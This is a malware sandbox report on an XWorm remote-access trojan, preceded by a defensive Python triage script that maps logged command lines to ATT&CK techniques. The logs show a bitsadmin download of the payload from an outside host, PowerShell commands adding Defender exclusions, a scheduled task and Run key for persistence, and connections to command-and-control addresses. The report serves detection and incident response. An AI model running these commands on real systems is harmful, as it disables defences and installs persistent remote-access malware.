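The process chain above is the whole infection in four commands: a BITS transfer drops XClient.exe into the user profile, two PowerShell calls add Defender exclusions for the path and the process name, and schtasks registers a task that relaunches the copy from Roaming every minute with the highest run level (the long run of XClient.exe entries that follows is that task firing). The same chain, with different file names, appears in behavioral19, behavioral20 and behavioral15 below. The following Python is an added example, not part of the sandbox report: it runs a small command-line triage over those captured lines, tags each behaviour with the ATT&CK technique I would map it to, and emits the Remove-MpPreference calls that undo the exclusions. The sample input is copied from the list above; the user-writable path list and the technique labels are my own choices.

```python
"""Command-line triage for the process chain above. Added example; not part of
the sandbox report. Tags Defender exclusions via Add-MpPreference, a one-minute
scheduled task running from a user-writable path, and a BITS download into
the user profile."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str      # ATT&CK Enterprise technique ID (my labelling)
    summary: str
    cmdline: str
    data: tuple = ()    # structured fields for follow-up (exclusion kind/value)


# Constructed input: command lines copied from the process list above.
SAMPLE_CMDLINES = r"""
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
taskeng.exe {328C09D4-728B-4380-B0EA-3FA004774498} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
""".strip().splitlines()

# Locations a standard user can write to; a task or download landing here is suspect.
USER_WRITABLE = re.compile(r"^[A-Z]:\\(Users\\(Public|[^\\]+\\AppData)|ProgramData)\\", re.I)
EXCLUSION_RE = re.compile(
    r"""Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)\s+(?:'([^']*)'|"([^"]*)"|(\S+))""", re.I)
SCHTASKS_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
BITS_RE = re.compile(r'bitsadmin(?:\.exe)?"?\s+/transfer\s+\S+\s+(\S+)\s+(\S+)', re.I)


def _opt(cmd, flag):
    """Value of a schtasks-style /flag option, quoted or bare; None if absent."""
    m = re.search(rf'/{re.escape(flag)}\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def triage(cmdlines):
    """Return one Finding per suspicious behaviour, in command-line order."""
    findings = []
    for cmd in cmdlines:
        m = EXCLUSION_RE.search(cmd)
        if m:
            kind = m.group(1)
            value = m.group(2) or m.group(3) or m.group(4)
            findings.append(Finding("T1562.001", f"Defender exclusion added: {kind}={value}", cmd, (kind, value)))
        if SCHTASKS_RE.search(cmd):
            sc, mo, rl = _opt(cmd, "sc"), _opt(cmd, "mo") or "1", _opt(cmd, "RL")
            notes = [f"task {_opt(cmd, 'tn')!r} runs every {mo} {sc}"]
            if rl and rl.upper() == "HIGHEST":
                notes.append("with /RL HIGHEST")
            if USER_WRITABLE.match(_opt(cmd, "tr") or ""):
                notes.append("from a user-writable path")
            findings.append(Finding("T1053.005", ", ".join(notes), cmd))
        m = BITS_RE.search(cmd)
        if m and USER_WRITABLE.match(m.group(2)):
            findings.append(Finding("T1197", f"BITS download {m.group(1)} -> {m.group(2)}", cmd))
    return findings


def exclusions_to_remove(findings):
    """Remove-MpPreference calls that undo the exclusions found; run on the host during cleanup."""
    return [f"Remove-MpPreference -Exclusion{kind} '{value}'"
            for f in findings if f.technique == "T1562.001" for kind, value in [f.data]]


if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for f in found:
        print(f.technique, f.summary)
    print(*exclusions_to_remove(found), sep="\n")
```

On a suspect host, `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess` shows whether the exclusions actually took (they fail silently when the PowerShell process is not elevated), and the task is removed with `schtasks /delete /tn "XClient" /f` before the Roaming copy is deleted, otherwise the next minute's run recreates the problem.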

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/2572-0-0x000007FEF6183000-0x000007FEF6184000-memory.dmp

memory/2572-1-0x0000000001170000-0x000000000117E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Output.exe

MD5 a731d63dc3edd963b906d0f861f7119c
SHA1 378d5339f1b675e98c81f4446f9e9ad81bc9da9f
SHA256 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad
SHA512 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6

memory/1800-7-0x0000000000130000-0x000000000013C000-memory.dmp

memory/1800-11-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 f27fe2354ebb52cffbb3a8cf66c6bdb3
SHA1 439ce7924db3f534a14d78470c57c98e397969ee
SHA256 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4
SHA512 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f

memory/2812-12-0x0000000000160000-0x0000000000170000-memory.dmp

memory/2300-17-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2300-18-0x0000000002080000-0x0000000002088000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d6288b5bc31fa80d87f5a2741f702a7e
SHA1 dde30199e258f61238a463d083cb33bad653f747
SHA256 530ae6615edb670572d84c86e1c294e174e920ebb3e5b4112051b889413f003b
SHA512 257ac3a3a996e2803e4aaa1609d50f2d5d1e21071082534258972ae0d26c927e57e579444fc525df6477b4f83039b989553900255060ea5636840e8bea6161cf

memory/1564-24-0x000000001B800000-0x000000001BAE2000-memory.dmp

memory/1564-25-0x0000000001E70000-0x0000000001E78000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 f065a5f352973e89b2e8d3efd79b98f8
SHA1 6a9a84e0a11010262ea35790fcdf824193805c76
SHA256 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405
SHA512 b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006

memory/1616-45-0x0000000001160000-0x0000000001170000-memory.dmp

memory/2840-51-0x00000000013B0000-0x00000000013C0000-memory.dmp

memory/2068-55-0x00000000002E0000-0x00000000002F0000-memory.dmp

memory/2236-57-0x0000000000020000-0x0000000000030000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win7-20240704-en

Max time kernel

360s

Max time network

370s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:41

Platform

win7-20240705-en

Max time kernel

361s

Max time network

364s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win7-20240704-en

Max time kernel

309s

Max time network

319s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:41

Platform

win10v2004-20240802-en

Max time kernel

432s

Max time network

434s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:32

Platform

win7-20240708-en

Max time kernel

357s

Max time network

360s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta"

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win10v2004-20240802-en

Max time kernel

428s

Max time network

430s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win10v2004-20240802-en

Max time kernel

441s

Max time network

443s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win7-20240729-en

Max time kernel

314s

Max time network

316s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win7-20240704-en

Max time kernel

307s

Max time network

316s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:29

Platform

win7-20240729-en

Max time kernel

314s

Max time network

317s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:40

Platform

win7-20240704-en

Max time kernel

361s

Max time network

364s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:41

Platform

win10v2004-20240802-en

Max time kernel

421s

Max time network

424s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:29

Platform

win7-20240708-en

Max time kernel

359s

Max time network

362s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:37

Platform

win7-20240729-en

Max time kernel

580s

Max time network

592s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1936 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\schtasks.exe
PID 1936 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\schtasks.exe
PID 1936 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Windows\system32\taskeng.exe

taskeng.exe {E4D399A1-1056-4EA6-BB64-DA63AD9DC360} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp

Files

memory/1936-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp

memory/1936-1-0x00000000003A0000-0x00000000003D4000-memory.dmp

memory/1936-2-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

memory/2684-7-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2684-8-0x0000000001E10000-0x0000000001E18000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f4c6c1b7c71397124c059b6996310a35
SHA1 8a837e53686e77a07859d60a98fab24c36079d3a
SHA256 6b4d966e98ea6966e454af2c83cdd758c625ae625e7ae038349e534b13a82e49
SHA512 fba0a7230e7e6265e8bd4210896211f0d86bdd3d811f502aa3c9b50a6dd60c1e9d0b6b4213ab956b354569079ada143d1fb7138b720eaa85bcb0d0cf2ab9bdfc

memory/2472-14-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/2472-15-0x0000000002670000-0x0000000002678000-memory.dmp

memory/1936-29-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp

memory/1936-30-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win10v2004-20240802-en

Max time kernel

597s

Max time network

601s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

